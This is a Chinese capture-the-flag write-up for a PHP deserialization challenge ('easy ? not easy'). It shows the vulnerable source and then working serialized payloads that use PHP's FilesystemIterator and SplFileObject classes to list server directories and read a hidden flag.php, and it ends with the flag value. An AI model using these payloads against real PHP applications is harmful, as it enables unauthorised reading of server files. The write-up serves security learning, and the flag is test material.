【web]-反序列化-easy ? not easy

打开后看到源码

php 复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}


if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
else{
    $a=new A;

} hello ctfer

分析源码只看到__wakeup函数,其他类没有什么可以利用的,起点、终点、跳板不管用了。只能用php原生态类来输出文件列表读取文件(而且过滤了一些特殊符号,命令通配符等,包含数字字母\,也只能用路径了),代替命令执行。最终的目的也是读取文件获取内容哦。

FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容,按行读取,跨行需要遍历
DirectoryIterator 遍历目录 直接echo会输出目录下的

读取一下目录/var/www/html

php 复制代码
<?php
class A{
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html';
	public $check;
}
$a =  new A();
echo serialize($a);
?>


O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

输出目录:1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE

继续构造

php 复制代码
<?php
class A{
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE';
	public $check;
}
$a =  new A();
echo serialize($a);
?>

O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

显示 flag.php,接下来就要读取内容

php 复制代码
<?php
class A{
	public $class = 'SplFileObject ';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
	public $check;
}
$a =  new A();
echo serialize($a);
?>


O:1:"A":3:{s:5:"class";s:14:"SplFileObject ";s:4:"para";s:56:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";s:5:"check";N;}

输入后得到结果:aced3598a34a561715dacfe32a328c1c

相关推荐
脸红ฅฅ*的思春期25 天前
Java安全—原生反序列化&重写方法&链条分析&触发类
java·安全·序列化·反序列化
是乙太呀1 个月前
php反序列化1_常见php序列化的CTF考题
开发语言·web安全·渗透测试·php·ctf·反序列化
Erosion20201 个月前
RMI原理及常见反序列化攻击手法
java·反序列化·java sec
Erosion20201 个月前
CommonsBeanUtils1(基于ysoserial)
反序列化·java sec
一路向北_.2 个月前
[网鼎杯 2020 青龙组]AreUSerialz
php·反序列化·网鼎杯
胡耀超3 个月前
序列化与反序列化深入分析:UUID案例的实践与JSON转换对比
java·json·uuid·序列化·反序列化
脸红ฅฅ*的思春期4 个月前
BUUCTF—[网鼎杯 2020 朱雀组]phpweb
反序列化·网鼎杯
炫酷的伊莉娜5 个月前
【ProtoBuf】通讯录实现(网络版)
序列化·反序列化·protobuf
Jay 175 个月前
2024年 春秋杯 网络安全联赛夏季赛 Web方向 题解WirteUp 部分
安全·web安全·网络安全·ctf·反序列化·udf提权·春秋杯